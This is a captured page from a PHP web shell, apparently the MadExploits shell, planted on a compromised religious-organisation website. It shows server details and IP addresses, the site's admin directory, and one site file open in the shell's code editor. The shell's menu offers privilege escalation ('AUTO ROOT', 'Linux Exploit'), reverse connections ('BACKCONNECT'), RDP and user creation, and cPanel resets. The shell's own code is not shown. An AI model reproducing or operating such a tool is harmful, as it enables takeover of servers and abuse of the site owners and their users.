Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.136
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
aryaadmin /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
10-09-2020-AG-arya_adminconnec...
1.59
KB
-rw-r--r--
arya_addadminusercategory.php
588
B
-rw-r--r--
arya_adminconnection.php
2.25
KB
-rw-r--r--
arya_adminconnection_29-07-22-...
1.62
KB
-rw-r--r--
arya_adminfunction.php
89.87
KB
-rw-r--r--
arya_ajaxLanguageChange.php
148
B
-rw-r--r--
arya_ajaxactiveinactive.php
405.2
KB
-rw-r--r--
arya_ajaxtestmark.php
576
B
-rw-r--r--
arya_fetcheventicon.php
513
B
-rw-r--r--
arya_fetchwallpaper.php
479
B
-rw-r--r--
arya_findcity.php
684
B
-rw-r--r--
arya_findcountry.php
673
B
-rw-r--r--
arya_findfromdate_todate.php
1.96
KB
-rw-r--r--
arya_findstate.php
638
B
-rw-r--r--
arya_fnd_adminusercatrights_aj...
1.95
KB
-rw-r--r--
arya_fnd_articlesnm_ajax.php
635
B
-rw-r--r--
arya_fnd_city_ajax.php
738
B
-rw-r--r--
arya_fnd_city_instajax.php
846
B
-rw-r--r--
arya_fnd_date_ajax.php
223
B
-rw-r--r--
arya_fnd_date_year.php
240
B
-rw-r--r--
arya_fnd_event_ajax.php
827
B
-rw-r--r--
arya_fnd_eventdate_ajax.php
1.71
KB
-rw-r--r--
arya_fnd_freqdate_ajax.php
5.96
KB
-rw-r--r--
arya_fnd_imagesize_ajax.php
1.26
KB
-rw-r--r--
arya_fnd_month_ajax.php
240
B
-rw-r--r--
arya_fnd_moondate_ajax.php
337
B
-rw-r--r--
arya_fnd_obituarycity_ajax.php
611
B
-rw-r--r--
arya_fnd_obituarystate_ajax.ph...
625
B
-rw-r--r--
arya_fnd_pendinglist_ajax.php
807
B
-rw-r--r--
arya_fnd_personnm_ajax.php
671
B
-rw-r--r--
arya_fnd_placenm_ajax.php
672
B
-rw-r--r--
arya_fnd_post_ajax.php
626
B
-rw-r--r--
arya_fnd_quecatnm_ajax.php
576
B
-rw-r--r--
arya_fnd_servicesnm_ajax.php
564
B
-rw-r--r--
arya_fnd_sessionstartdate.php
2.97
KB
-rw-r--r--
arya_fnd_sliderhomeenddate_aja...
2.19
KB
-rw-r--r--
arya_fnd_state_ajax.php
742
B
-rw-r--r--
arya_fnd_thirddate_ajax.php
974
B
-rw-r--r--
arya_fndaprvornot.php
3.13
KB
-rw-r--r--
arya_fndquckupldaprv.php
321
B
-rw-r--r--
arya_fndreportapprove.php
299
B
-rw-r--r--
arya_fndreportaprornot.php
1.75
KB
-rw-r--r--
arya_globlang_ajax.php
1010
B
-rw-r--r--
arya_loginstatusajax.php
1.45
KB
-rw-r--r--
arya_paginationlimit.php
1.87
KB
-rw-r--r--
arya_removeimage.php
2.46
KB
-rw-r--r--
arya_sessioncheck.php
214
B
-rw-r--r--
excelwriter.class.php
6.2
KB
-rw-r--r--
variable.php
477
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : arya_fnd_sliderhomeenddate_ajax.php
<?php include('../arya_AdminInclude.php'); //list($c_year,$c_month,$c_day) = split('-',$_SESSION['fetchstdate']); $cruntvaldate=date('Y-m-d H:i:s'); if($_GET['day'] > 0) { $day =$_GET['day']; $_SESSION['sday']=$_GET['day']; } else { if($_SESSION['sday']!="") { $day=$_SESSION['sday']; } else { $day=date('d'); $_SESSION['sday']=date('d'); } } if($_GET['month']>0) { if($_SESSION['smonth']==$_GET['month']) { $month =$_SESSION['smonth']; } else { $month=$_GET['month']; $_SESSION['smonth']=$_GET['month']; } } else { if($_SESSION['smonth']!="") { $month=$_SESSION['smonth']; } else { $month=date('m'); $_SESSION['smonth']=date('m'); } } if($_GET['year'] > 0) { $_SESSION['syear']; $_GET['year']; if($_SESSION['syear']==$_GET['year']) { $year =$_SESSION['syear']; } else { $year =$_GET['year']; $_SESSION['syear']=$_GET['year']; } } else { if($_SESSION['syear']!="") { $year=$_SESSION['syear']; } else { $year=date('Y'); $_SESSION['syear']=date('Y'); } } //to date code start if($day >=25) { $dispCont .='<select id="day1" name="day1">'.GetDay($day+7-31).'</select>'; } else { $dispCont .='<select id="day1" name="day1">'.GetDay($day+7).'</select>'; } if($day >=25 && $month >=12) { $dispCont .='<select id="month1" name="month1">'.GetMonth($month+1-12).'</select>'; } else { $dispCont .='<select id="month1" name="month1">'.GetMonth($month).'</select>'; } //if($month > 12 || $month >=11 || $month >=8) if($day >= 25 && $month=='12') { $dispCont .='<select id="year1" name="year1">'.GetYear($year+1).'</select>'; } else { $dispCont .='<select id="year1" name="year1">'.GetYear($year).'</select>'; } $dispCont .='<select id="endhour" name="endhour">'.GetHour(date('H',strtotime($_GET["date"]))).'</select>'; $dispCont .='<select id="endminutes" name="endminutes">'.GetPortalBanner(date('i',strtotime($_GET["date"]))).'</select>'; $dispCont .='<select id="endsecond" name="endsecond">'.GetTestSecond(date('s',strtotime($_GET["date"]))).'</select>'; $dispCont .='</div></td> <div class="clr"></div>'; echo $dispCont; ?>
Close